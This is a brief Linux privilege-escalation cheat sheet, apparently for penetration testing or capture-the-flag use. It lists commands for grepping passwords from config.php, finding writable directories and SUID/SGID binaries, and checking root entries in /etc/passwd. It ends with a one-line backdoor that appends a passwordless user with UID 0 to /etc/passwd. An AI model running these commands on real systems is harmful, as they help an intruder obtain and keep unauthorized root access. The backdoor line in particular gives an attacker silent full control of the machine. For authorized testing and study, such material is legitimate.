Distribution type & kernel version
Default writeable directory / folder
Search for password within config.php
grep -R 'password' config.php
Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
Service(s) running as root user
ls -lah /var/cache/apt/archivesO
grep -rnw '/etc/passwd' -e 'root'
Sticky bit, SGID, SUID, GUID
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd